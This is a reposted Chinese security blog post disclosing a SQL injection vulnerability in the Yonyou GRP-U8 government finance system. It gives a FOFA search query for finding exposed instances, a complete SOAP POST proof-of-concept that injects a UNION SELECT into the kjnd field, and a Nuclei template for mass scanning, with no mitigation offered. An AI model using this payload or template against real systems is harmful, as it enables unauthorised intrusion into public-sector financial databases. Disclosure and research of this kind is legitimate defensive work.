用友GRP-U8 operOriztion SQL注入漏洞

admin 2024年4月24日01:42:27评论12 views字数 1862阅读6分12秒阅读模式

0x00 阅读须知

免责声明:本文提供的信息和方法仅供网络安全专业人员用于教学和研究目的,不得用于任何非法活动。读者若使用文章内容从事任何未授权的行为,需自行承担所有法律责任和后果。本公众号及作者对由此引起的任何直接或间接损失不负责任。请严格遵守相关法律法规。

0x01 漏洞简介

用友GRP-U8是面向政府及行政事业单位的财政管理应用。这个系统在/services/operOriztion发现SQL注入漏洞。

用友GRP-U8 operOriztion SQL注入漏洞

用友GRP-U8 operOriztion SQL注入漏洞

用友GRP-U8 operOriztion SQL注入漏洞

0x02 漏洞详情

fofa:app="用友-GRP-U8"

Poc:

POST /services/operOriztion HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Content-Type: text/xml;charset=UTF-8SOAPAction: ""Content-Length: 477<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsdd="http://xml.apache.org/axis/wsdd/"><soapenv:Header/><soapenv:Body><wsdd:getGsbmfaByKjnd soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><kjnd xsi:type="xsd:string">' UNION ALL SELECT @@version --</kjnd></wsdd:getGsbmfaByKjnd></soapenv:Body></soapenv:Envelope>

用友GRP-U8 operOriztion SQL注入漏洞

0x03 Nuclie

id: yongyou_grp_u8-operOriztion-sqliinfo:  name: yongyou_grp_u8-operOriztion-sqli  author: unknow  severity: high  description: 用友GRP-U8 operOriztion SQL注入漏洞  tags: yongyou,sqli  metadata:    fofa-qeury: app="用友-GRP-U8"http:  - raw:      - |                      POST /services/operOriztion HTTP/1.1        Host:         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0        Content-Type: text/xml;charset=UTF-8        SOAPAction: ""        Content-Length: 477        <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsdd="http://xml.apache.org/axis/wsdd/">        <soapenv:Header/>        <soapenv:Body>        <wsdd:getGsbmfaByKjnd soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">        <kjnd xsi:type="xsd:string">' UNION ALL SELECT @@version --</kjnd>        </wsdd:getGsbmfaByKjnd>        </soapenv:Body>        </soapenv:Envelope>    matchers:           - type: dsl        name: sqli        dsl:          - (status_code==200 )  && contains(body, "Microsoft SQL Server")

用友GRP-U8 operOriztion SQL注入漏洞

原文始发于微信公众号(贫僧法号云空):用友GRP-U8 operOriztion SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月24日01:42:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友GRP-U8 operOriztion SQL注入漏洞https://cn-sec.com/archives/2683513.html

发表评论

匿名网友 填写信息